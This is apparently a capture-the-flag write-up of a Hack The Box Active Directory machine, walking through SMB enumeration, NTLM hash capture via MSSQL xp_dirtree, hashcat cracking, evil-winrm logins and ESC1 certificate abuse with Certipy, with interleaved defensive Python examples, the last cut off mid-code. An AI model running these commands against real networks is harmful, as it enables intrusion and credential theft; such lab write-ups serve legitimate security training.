| description |
|---|
| 04-26-2023 |
{% embed url="https://wadcoms.github.io/" %}
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-27 11:44:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-04-27T11:45:45+00:00; +8h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-27T11:45:44+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-04-27T11:39:41
| Not valid after: 2053-04-27T11:39:41
| MD5: a88f07c39852cdde944e3fe7ad3a8997
|_SHA-1: 2b6b0afd3b49670065095d8b95719cb10c6171be
| ms-sql-ntlm-info:
| 10.129.229.159:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-04-27T11:45:45+00:00; +8h00m01s from scanner time.
| ms-sql-info:
| 10.129.229.159:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-27T11:45:04
|_ start_date: N/A
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Port 123 (NTP) is open as well.
We can tell that this is a domain controller because port 88 (Kerberos) is open; the LDAP (389/636), kpasswd (464) and ADWS (9389) ports support that.
Domain obtained from the 389 LDAP banner (the certificate also names the host dc.sequel.htb):
- Add to /etc/hosts
sequel.htb
At first, I attempted to run nmap, utilizing its scripting engine to enumerate LDAP:
nmap -n -sV --script "ldap* and not brute" 10.129.229.159 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 00:42 EDT
Nmap scan report for 10.129.229.159
Host is up (0.035s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-27 12:42:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
----CUT HERE TO SAVE SPACE----
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=sequel,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
| namingContexts: DC=sequel,DC=htb
| namingContexts: CN=Configuration,DC=sequel,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
| namingContexts: DC=DomainDnsZones,DC=sequel,DC=htb
| namingContexts: DC=ForestDnsZones,DC=sequel,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 168070
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sequel,DC=htb
| dnsHostName: dc.sequel.htb
| defaultNamingContext: DC=sequel,DC=htb
| currentTime: 20230427124241.0Z
|_ configurationNamingContext: CN=Configuration,DC=sequel,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
ldapsearch -x -H ldap://10.129.229.159 -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# extended LDIF
#
# LDAPv3
# base <DC=<1_SUBDOMAIN>,DC=<TLD>> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
- We see "a successful bind must be completed on the connection"
- This means the DC does not accept an anonymous (null) bind for this query: the credentials provided (none) are rejected and valid ones are required (note the base DN placeholders were never substituted either, but the bind is refused before that matters)
rpcdump:
impacket-rpcdump -p 135 10.129.229.159
No success
Enumerate SMB shares with SMB Client:
smbclient -N -L \\\\10.129.229.159
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
- I then manually went through the listed share names with smbget to see whether any of them were readable without credentials
Discovering the SQL Server Procedures Document:
smbget -R -U "" smb://10.129.229.159/Public
Password for [] connecting to //10.129.229.159/Public:
Using workgroup WORKGROUP, guest user
smb://10.129.229.159/Public/SQL Server Procedures.pdf
Downloaded 48.39kB in 1 seconds
Access the PDF:
firefox SQL\ Server\ Procedures.pdf
It looks like we need to enumerate MSSQL now. The PDF also provides a set of credentials:
PublicUser:GuestUserCantWrite1
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.202.159 -Pn
impacket-mssqlclient PublicUser@sequel.htb
password: GuestUserCantWrite1
Attempted to enable xp_cmdshell, but it did not work.
Begin SMB Server:
sudo impacket-smbserver ./ -smb2support
Authenticate to MSSQL server with newly obtained credentials:
impacket-mssqlclient PublicUser@sequel.htb
password: GuestUserCantWrite1
Trigger the NTLM attack: xp_dirtree makes the SQL Server service account authenticate to our SMB server, which records its Net-NTLMv2 response:
xp_dirtree '\\10.10.14.23\any\thing'
{% code overflow="wrap" %}
sql_svc::sequel:aaaaaaaaaaaaaaaa:7772050ee5ee1f89fc33c64c1d1272ef:01010000000000008051705cd579d901069a53da1cbddf9f00000000010010004d0077006b004100510071006f004400030010004d0077006b004100510071006f004400020010004f007500420077005700430056005800040010004f007500420077005700430056005800070008008051705cd579d901060004000200000008003000300000000000000000000000003000003d52eb97775a1999339f81b907194ef13041aa9cdcb498705ec7a93bf279f7190a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320033000000000000000000
{% endcode %}
This method was taken from hacktricks!
Let's attempt to crack the Net-NTLMv2 hash we just captured!
- Place the entire hash into a file named hash.txt
- Use hashcat (mode 5600, NetNTLMv2) to crack the hash with a wordlist such as rockyou.txt
- Obtain password or attempt to pass the hash around the network if it fails
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt -O
cracked.txt:
{% code overflow="wrap" %}
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:55c3306c2a424405a7723b2fd4438adb:01010000000000008085528dd979d90109cbfb83529a36f000000000010010006800530049006500640061006c006600030010006800530049006500640061006c006600020010006b007900590078005100640049004300040010006b007900590078005100640049004300070008008085528dd979d901060004000200000008003000300000000000000000000000003000003d52eb97775a1999339f81b907194ef13041aa9cdcb498705ec7a93bf279f7190a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320033000000000000000000:REGGIE1234ronnie
{% endcode %}
SQL_SVC:REGGIE1234ronnie
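To make clear what xp_dirtree actually handed over, here is an added Python example (it is not from this writeup, nor from impacket or hashcat) that parses the cracked.txt line above, decodes the NTLMv2 response blob (the timestamp and the AV_PAIR target name tell a defender when the coerced authentication happened and which host it was sent to), and checks a candidate password against the NTProofStr using the NTOWFv2 construction from MS-NLMP. MD4 is written out in pure Python because OpenSSL 3 builds of hashlib often leave it disabled; the only page-specific value is the cracked.txt line itself, and the AV_PAIR id-to-name table is mine.

```python
import hashlib
import hmac
import struct
from datetime import datetime, timedelta, timezone

# The cracked.txt line from the page, exactly as hashcat -m 5600 wrote it:
# user::domain:server_challenge:NTProofStr:blob:password
CRACKED_LINE = "SQL_SVC::sequel:aaaaaaaaaaaaaaaa:55c3306c2a424405a7723b2fd4438adb:01010000000000008085528dd979d90109cbfb83529a36f000000000010010006800530049006500640061006c006600030010006800530049006500640061006c006600020010006b007900590078005100640049004300040010006b007900590078005100640049004300070008008085528dd979d901060004000200000008003000300000000000000000000000003000003d52eb97775a1999339f81b907194ef13041aa9cdcb498705ec7a93bf279f7190a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320033000000000000000000:REGGIE1234ronnie"

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's MD4 is frequently unavailable under OpenSSL 3)."""
    def rotl(x, n):
        x &= MASK
        return ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                            # round 1
            a = rotl(a + f(b, c, d) + w[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl(a + g(b, c, d) + w[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl(a + h(b, c, d) + w[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password; this is the NT hash stored in AD."""
    return md4(password.encode("utf-16le"))


def parse_hashcat_line(line: str) -> dict:
    """Split the hashcat -m 5600 format; the password is present only in cracked output."""
    parts = line.strip().split(":")
    return {
        "user": parts[0],
        "domain": parts[2],
        "challenge": bytes.fromhex(parts[3]),
        "ntproofstr": bytes.fromhex(parts[4]),
        "blob": bytes.fromhex(parts[5]),
        "password": ":".join(parts[6:]) if len(parts) > 6 else None,
    }


def verify_password(rec: dict, password: str) -> bool:
    """Recompute NTProofStr (MS-NLMP 3.3.2) and compare it to the captured one."""
    identity = (rec["user"].upper() + rec["domain"]).encode("utf-16le")
    ntlmv2_key = hmac.new(nt_hash(password), identity, hashlib.md5).digest()   # NTOWFv2
    proof = hmac.new(ntlmv2_key, rec["challenge"] + rec["blob"], hashlib.md5).digest()
    return hmac.compare_digest(proof, rec["ntproofstr"])


# AV_PAIR ids from MS-NLMP 2.2.2.1 (my own short names for the string-valued ones).
AV_NAMES = {1: "nb_computer", 2: "nb_domain", 3: "dns_computer", 4: "dns_domain",
            5: "dns_tree", 9: "target"}


def describe_blob(blob: bytes) -> dict:
    """Decode the NTLMv2_CLIENT_CHALLENGE: FILETIME timestamp, client nonce and AV_PAIR list."""
    filetime = struct.unpack_from("<Q", blob, 8)[0]        # 100 ns ticks since 1601-01-01
    info = {
        "timestamp": datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10),
        "client_challenge": blob[16:24].hex(),
    }
    off = 28                                                # AV_PAIRs follow the reserved dword
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:                                      # MsvAvEOL
            break
        value = blob[off:off + av_len]
        off += av_len
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = value.decode("utf-16le")
    return info


if __name__ == "__main__":
    rec = parse_hashcat_line(CRACKED_LINE)
    info = describe_blob(rec["blob"])
    print(f"{rec['domain']}\\{rec['user']} authenticated to {info['target']} "
          f"at {info['timestamp']:%Y-%m-%d %H:%M:%S}Z (sender's clock)")
    print("cracked password verifies:", verify_password(rec, rec["password"]))
```

Two things worth noticing in the decoded blob: the timestamp is the sending host's clock, so it carries the same eight-hour skew nmap reported, and MsvAvTargetName records the SPN the account was talking to (here the attacker-controlled SMB server), which is the field to keep when triaging such a capture. Only the NT hash of the candidate enters the computation, so a service account with a long random password (or a gMSA) leaves a captured response with nothing crackable.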
evil-winrm -i sequel.htb -u SQL_SVC -p 'REGGIE1234ronnie'
Upon performing some manual enumeration of the file system, I stumbled across a SQLServer directory containing a backed-up error log:
C:\SQLServer\Logs\ERRORLOG.BAK
In it we can see a failed logon attempt for a suspicious-looking user named 'NuclearMosquito3'. This clearly looks like a password typed into the username field. Let's try it with Ryan.Cooper!
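Here is the detection side of that finding as an added Python example (not from the writeup). SQL Server logs each failed logon to the ERRORLOG as an `Error: 18456` line whose State says why (5: no such login, 8: wrong password), followed by a `Login failed for user '...'` line. The function pairs those two lines and flags failures for names that do not exist and look like a password was typed into the user field. The log excerpt is constructed in SQL Server's ERRORLOG format (it is not the ERRORLOG.BAK from this box), and the known-account set and the `looks_like_secret` heuristic are my own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed ERRORLOG excerpt in SQL Server's format (not the real ERRORLOG.BAK from the box).
SAMPLE_ERRORLOG = r"""
2022-11-18 13:43:05.24 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:05.24 Logon       Login failed for user 'sequel\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:43:07.44 Logon       Login failed for user 'NuclearMosquito3'. Reason: Could not find a login matching the name provided. [CLIENT: 127.0.0.1]
2022-11-18 13:44:10.02 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:44:10.02 Logon       Login failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

ERROR_RE = re.compile(r"^(?P<ts>\S+ \S+)\s+Logon\s+Error: 18456, Severity: \d+, State: (?P<state>\d+)\.")
FAILED_RE = re.compile(r"^(?P<ts>\S+ \S+)\s+Logon\s+Login failed for user '(?P<name>[^']*)'"
                       r".*\[CLIENT: (?P<client>[^\]]+)\]")
STATE_NO_SUCH_LOGIN = 5


@dataclass
class Finding:
    timestamp: str
    name: str
    client: str
    state: Optional[int]
    reasons: list


def looks_like_secret(name: str) -> bool:
    """Heuristic: no domain qualifier, and the upper/lower/digit mix typical of a password."""
    if "\\" in name or "@" in name:
        return False
    classes = (any(c.isupper() for c in name), any(c.islower() for c in name),
               any(c.isdigit() for c in name))
    return all(classes) or len(name) >= 16


def find_suspect_logins(log_text: str, known_accounts: set) -> list:
    """Pair each 18456 error with its 'Login failed' line and flag likely leaked credentials."""
    known = {a.lower() for a in known_accounts}
    findings, last_state = [], None
    for line in log_text.splitlines():
        m = ERROR_RE.match(line)
        if m:
            last_state = int(m.group("state"))
            continue
        m = FAILED_RE.match(line)
        if not m:
            continue
        name = m.group("name")
        reasons = []
        if last_state == STATE_NO_SUCH_LOGIN or name.lower() not in known:
            reasons.append("login name does not exist")
        if looks_like_secret(name):
            reasons.append("name looks like a password typed into the user field")
        if reasons:
            findings.append(Finding(m.group("ts"), name, m.group("client"), last_state, reasons))
        last_state = None
    return findings


if __name__ == "__main__":
    for f in find_suspect_logins(SAMPLE_ERRORLOG, {"sequel\\Ryan.Cooper", "PublicUser", "sa"}):
        print(f"{f.timestamp} {f.name!r} from {f.client} (state {f.state}): {'; '.join(f.reasons)}")
```

A hit should be handled as a credential disclosure rather than a failed logon: rotate the password of whichever account it belongs to, and remember that backups such as ERRORLOG.BAK keep the string long after the live log has rolled over. The same pattern shows up in Windows Security event 4625 when a password lands in the account-name field.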
evil-winrm -i sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3'
bloodhound-python -d sequel.htb -v -u Ryan.Cooper -p NuclearMosquito3 -gc sequel.htb -c all -ns 10.129.202.159
Opening Bloodhound:
sudo neo4j console &
bloodhound
I then placed all of this information into BloodHound and was able to analyze the results. Running adPEAS on the host flagged the following certificate template:
[?] +++++ Checking Template 'UserAuthentication' +++++
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
[!] Identity 'sequel\sql_svc' has 'GenericAll' permissions on template 'UserAuthentication'
[+] Identity 'sequel\Domain Users' has enrollment rights for template 'UserAuthentication'
Template Name: UserAuthentication
Template distinguishedname: CN=UserAuthentication,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb
Date of Creation: 11/18/2022 21:10:22
[+] Extended Key Usage: Client Authentication, Secure E-mail, Encrypting File System
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[!] Template Permissions: sequel\sql_svc : GenericAll
[+] Enrollment allowed for: sequel\Domain Users
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Related to certificate abuse?
{% embed url="https://github.com/ly4k/Certipy" %}
- GenericAll ACEs on the Ryan.Cooper object (PowerView):
Get-ObjectAcl -SamAccountName Ryan.Cooper -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-4078382237-1492182817-2568127209-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Ryan.Cooper,CN=Users,DC=sequel,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1105
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-4078382237-1492182817-2568127209-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
Tried to add Ryan.Cooper to the Domain Admins group via GenericAll:
net group "domain admins" Ryan.Cooper /add /domain
Unfortunately, this did not work for me: the GenericAll ACEs listed above are held by Domain Admins (RID 512), Account Operators (S-1-5-32-548), SYSTEM (S-1-5-18) and Enterprise Admins (RID 519). They are rights over Ryan.Cooper, not rights that Ryan.Cooper holds.
Based on adPEAS findings, I believe that the DC may be vulnerable to AD Certificate Abuse.
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Let's use Certipy to attempt this.
Installation:
pip3 install certipy-ad
Enumeration:
certipy find -u Ryan.Cooper@sequel.htb -p 'NuclearMosquito3' -dc-ip 10.129.203.192
Next, open the text file generated by Certipy; the vulnerability is listed there.
{% code overflow="wrap" %}
[!] Vulnerabilities
[!] Template 'UserAuthentication' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
ESC1: 'SEQUEL.HTB\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
{% endcode %}
- We see that the template 'UserAuthentication' is flagged as ESC1: Domain Users can enroll, the enrollee supplies the subject, and the template allows client authentication
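The same conditions Certipy lists can be checked from the defender's side over your own templates. The added Python example below (not from the writeup or from Certipy) expresses the ESC1 preconditions as a function over the template attributes as stored in AD (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage) plus the SIDs holding enrollment rights, and evaluates the UserAuthentication template from the adPEAS output next to two corrected copies. The template dictionaries are hand-built from the page's output: the enrollment-flag value is reconstructed from the flag names adPEAS printed, msPKI-RA-Signature is assumed to be 0 (Certipy would not report ESC1 otherwise), and the `enroll_sids` key is my simplification of the template's security descriptor. A real audit reads these attributes from CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration.

```python
# Bit values from MS-CRTD (certificate template schema), named as adPEAS/Certipy print them.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001     # msPKI-Certificate-Name-Flag
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000       # msPKI-Certificate-Name-Flag: CA builds the SAN from AD
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001  # msPKI-Enrollment-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002             # msPKI-Enrollment-Flag: manager approval required
CT_FLAG_PUBLISH_TO_DS = 0x00000008                 # msPKI-Enrollment-Flag

# EKUs that make a certificate usable for domain authentication (why ESC1 matters).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals that count as "low-privileged" enrollers.
LOW_PRIV_RIDS = ("-513", "-515")                   # Domain Users, Domain Computers
LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}            # Authenticated Users, Everyone

DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"   # from the Get-ObjectAcl output above

# UserAuthentication as adPEAS showed it: ENROLLEE_SUPPLIES_SUBJECT set, Client Authentication EKU,
# Domain Users may enroll. msPKI-RA-Signature = 0 is an assumption (see lead-in).
USER_AUTHENTICATION = {
    "name": "UserAuthentication",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2",        # Client Authentication
                            "1.3.6.1.5.5.7.3.4",        # Secure E-mail
                            "1.3.6.1.4.1.311.10.3.4"],  # Encrypting File System
    "enroll_sids": [DOMAIN_SID + "-513"],              # sequel\Domain Users
}

# Two ways to fix it: let the CA build the subject from AD, or require manager approval.
FIXED_SUBJECT_FROM_AD = {**USER_AUTHENTICATION, "name": "UserAuthentication-fixedSAN",
                         "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN}
FIXED_MANAGER_APPROVAL = {**USER_AUTHENTICATION, "name": "UserAuthentication-approval",
                          "msPKI-Enrollment-Flag": USER_AUTHENTICATION["msPKI-Enrollment-Flag"]
                          | CT_FLAG_PEND_ALL_REQUESTS}


def is_low_privileged(sid: str) -> bool:
    return sid in LOW_PRIV_SIDS or sid.endswith(LOW_PRIV_RIDS)


def esc1_conditions(template: dict) -> dict:
    """Each ESC1 precondition as a named boolean; the template is ESC1 only when all hold."""
    ekus = set(template["pKIExtendedKeyUsage"])
    return {
        "enrollee supplies subject": bool(template["msPKI-Certificate-Name-Flag"]
                                          & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": template["msPKI-RA-Signature"] == 0,
        # An empty EKU list means "any purpose", which also allows authentication.
        "allows client authentication": not ekus or bool(ekus & AUTH_EKUS),
        "low-privileged enrollment": any(is_low_privileged(s) for s in template["enroll_sids"]),
    }


def is_esc1(template: dict) -> bool:
    return all(esc1_conditions(template).values())


def audit(templates: list) -> list:
    """Names of the templates that satisfy every ESC1 condition."""
    return [t["name"] for t in templates if is_esc1(t)]


if __name__ == "__main__":
    for t in (USER_AUTHENTICATION, FIXED_SUBJECT_FROM_AD, FIXED_MANAGER_APPROVAL):
        print(t["name"], "ESC1" if is_esc1(t) else "ok", esc1_conditions(t))
```

The check deliberately covers ESC1 only. The GenericAll that sequel\sql_svc holds on the template in the adPEAS output is a separate weakness (control over the template object itself, ESC4 in Certipy's numbering), since a principal with write access can simply set the flags this check looks for.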
Using the syntax for exploiting an ESC1 template:
certipy req -username Ryan.Cooper@sequel.htb -password NuclearMosquito3 -ca sequel-DC-CA -target ca.sequel.htb -template UserAuthentication -upn administrator@sequel.htb -dns dc.sequel.htb
certipy auth -pfx 'administrator_dc.pfx'
I ended up getting a Kerberos error: KRB_AP_ERR_SKEW (Clock skew too great).
This happens because our system time is more than 5 minutes off from the Kerberos server's clock (the nmap scan already showed a skew of about 8 hours).
This can be fixed with:
sudo ntpdate <ip_of_DC>
NOTE: if you are still getting this error, go into your virtual machine settings and disable network time sync. This was my case.
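Both pre-flight checks this writeup leans on, recognising a domain controller from its open ports (top of the page) and reading the clock skew nmap reports so that a KRB_AP_ERR_SKEW failure can be predicted before any Kerberos request, can be automated. The following is an added Python example, not from the writeup; the scan excerpt embedded in it is copied from the nmap output at the top of this page, while the port-to-role mapping and the 300-second tolerance constant (Kerberos' default) are mine.

```python
import re

# Excerpt of the nmap normal output from the top of the page (only lines the parser reads).
SCAN = """\
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-27 11:44:15Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-27T11:45:45+00:00; +8h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
DOMAIN_RE = re.compile(r"\(Domain: ([^,)]+)")
SKEW_RE = re.compile(r"(-?)(?:(\d+)h)?(?:(\d+)m)?(\d+)s")   # nmap prints e.g. 8h00m00s, 1m3s, -1s
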